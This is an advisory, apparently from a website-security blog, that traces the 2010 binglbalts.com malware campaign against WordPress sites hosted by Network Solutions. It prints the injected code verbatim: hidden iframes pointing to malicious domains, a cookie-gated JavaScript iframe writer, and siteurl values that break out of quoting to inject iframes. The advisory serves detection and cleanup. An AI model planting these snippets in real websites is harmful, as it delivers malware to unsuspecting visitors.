binglbalts.com Malware
Updated: June 2, 2010
The binglbalts.com malware places one of a variety of malicious codes into websites. The malware have has placed a malicious iframe into web pages, obfuscated JavaScript into external JavaScript files, and modified a database field in WordPress based websites.
The malware appears to have begun by infecting WordPress website hosted by Network Solutions due to poor security in their systems. Network Solutions claimed they had fixed the cause on April 11, but they did not dislose what it was. On April 18, as websites were again being infected, Network Solutions said the were still dealing with issues. On April 20, they claimed that they had fixed the cause, but again they did not dislose what it was. Approximately four months ago it infected some website with an iframe pointing to globalwat.com in the footer.php of the WordPress theme being utilized. In early April it began placing iframes pointing to binglbalts.com in the footer.php of the WordPress theme being utilized. It then started modifying or creating new external JavaScript files with code that created an iframe pointing to binglbalts.com. Then it started replacing the siteurl of the WordPress database with iframe pointing to networkads.net. Then it was replacing the siteurl of the WordPress database with iframe pointing to mainnetsoll.com and adding modifying or creating new external JavaScript files with code that created an iframe pointing to mainnetsoll.com. And then web pages were infected with JavaScript code that created an iframe pointing to corpadsinc.com and mainnetsoll.com, hugeadsorg.com, bigcorpads.com, ginopost.com, and grepad.com. Most recently Google has been flagging several hundred Network Solutions hosted websites for distributing malware from 92.63.111.0.
The infection has since spread to infect websites, that are not WordPress based websites hosted by Network Solutions, with an iframe pointing to binglbalts.com or networkads.net. These website have been infected via FTP. The most likely cause of these infections is that the FTP credentials of those websites were compromised when a computer, that has accessed the website via FTP, was used to visit a website that is infected with the binglbalts.com malware.
Recent Code Placed in Web Pages:
<iframe frameborder="0" onload=' if (!this.src){ this.src="http://binglbalts.com/grep/"; this.height=0; this.width=0;} '></iframe>
<iframe frameborder="0" onload=' if (!this.src){ this.src="http://networkads.net/grep/"; this.height=0; this.width=0;} '></iframe>
Recent Code in Standalone JavaScript Files:
function addCookie(name, value, hours) { var date = new Date(); date.setTime(date.getTime()+(hours*3600000)); var expires = "; expires="+date.toGMTString(); document.cookie = name+"="+value+expires+"; "; } var c=document.cookie; if (c.indexOf("seref")==-1) { document.write('<iframe frameborder="0" onload=\' if (!this.src){ this.src="http://binglbalts.com/grep/"; this.height=0; this.width=0;} \'> </iframe>'); addCookie("seref", "1", 24); }
Recent Code In JavaScript Files:
Recent Code Placed in siteurl Value in WordPress Database:
"'><iframe style="display:none" height="0" width="1" src="http://networkads.net/grep/"'></iframe'>
"'><iframe style="display:none" height="0" width="1" src="http://mainnetsoll.com/grep/"'></iframe'>